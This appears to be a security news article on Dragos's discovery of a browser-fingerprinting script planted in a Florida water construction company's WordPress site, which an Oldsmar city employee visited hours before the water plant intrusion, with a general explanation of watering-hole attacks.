Watering-Hole Attack Targeting Water Utilities Discovered
The Florida Water Plant Compromise Happened Hours After an Employee Accessed A Malicious Website.
Back in February, a hacker gained access to the water system of Oldsmar, Florida and tried to pump in a dangerous amount of a sodium hydroxide (lye). Luckily, a worker spotted it and reversed the action.
Recently, researchers from security firm Dragos found that the WordPress website of a water infrastructure construction company in Florida was “hosting malicious code” in the footer file. This was a way to lure in operators at water utilities in Florida and elsewhere. Over 1,000 end-user computers visited the site during the 58-day window that it was infected.
Geolocation of US fingerprinted client computers
Image Source: Dragos
According to the report, on February 5 at 9:49 am ET, an employee for the city of Oldsmar visited the malicious website targeting water utilities. This was just hours before someone broke into the computer system for the city’s water treatment plant and tried to poison drinking water. Although the site likely played no role in the intrusion, the incident remains unsettling.
This is not a typical watering hole. We have medium confidence it did not directly compromise any organization. But it does represent an exposure risk to the water industry and highlights the importance of controlling access to untrusted websites, especially for Operational Technology (OT) and Industrial Control System (ICS) environments.
Watering-hole attacks have become more and more frequent in cyberattacks that target specific industries or groups of users.
As explained in our cybersecurity glossary, in a watering-hole attack
The threat actor spends time to gain strategic information about the target: observes which legitimate websites are more often visited by the members of the group. Then the attacker exploits a vulnerability and infects one of those trusted websites with malware, without the knowledge of the site’s owner. Eventually, someone from that organization will fall into the trap and get their computer infected. This way, the attacker gains access to the target’s entire network.
Just as predators lie in wait near watering holes frequented by their prey, hackers often compromise one or more websites used by the target group and plant malicious code tailored to those who visit them. These attacks work because of the constant vulnerabilities in website technologies, even with the most popular systems, such as WordPress, making it easier than ever to stealthily compromise websites. According to Dragos, the site appeared to target water utilities, especially those in Florida.
Over 100 pieces of visitors’ detailed information were gathered by the malicious code, including their OS and CPU type, browser and supported languages, geolocation services, time zone, video codecs, screen dimensions, browser plugins, touch points, input methods, and whether cameras, accelerometers, or microphones were present.
What’s more, visitors were redirected to two separate sites that collected cryptographic hashes that uniquely identified each connecting device and uploaded the fingerprints to a database hosted at bdatac.herokuapp[.]com.
Website compromised with a unique browser enumeration and fingerprinting script
Image Source: Dragos
Code from four different code projects was used by the fingerprinting script: core-js, UAParser, regeneratorRuntime, and a data-collection script observed on only two other websites, both of which are associated with domain registration, hosting, and web development company.
With the forensic information we collected so far, Dragos’s best assessment is that an actor deployed the watering hole on the water infrastructure construction company site to collect legitimate browser data for the purpose of improving the botnet malware’s ability to impersonate legitimate web browser activity. The botnet’s use of at least ten different cipher handshakes or JA3 hashes, some of which mimic legitimate browsers, compared to the widely published hash of a single handshake of a previous Tofsee bot iteration is evidence of botnet improvement.
Dragos was initially worried that the site posed a significant threat due to its:
- Focus on Florida;
- The association with the Oldsmar attack;
- Few code locations on the Internet;
- Similarity to watering-hole attacks by other ICS-targeting activity groups such as DYMALLOY, ALLANITE, and RASPITE.
Finally, the company doesn’t believe the site delivered any exploits or tried to gain unauthorized access to visiting computers. The discovery should, however, be a wake-up call.
For the time being, Oldsmar officials didn’t respond to a request for comment.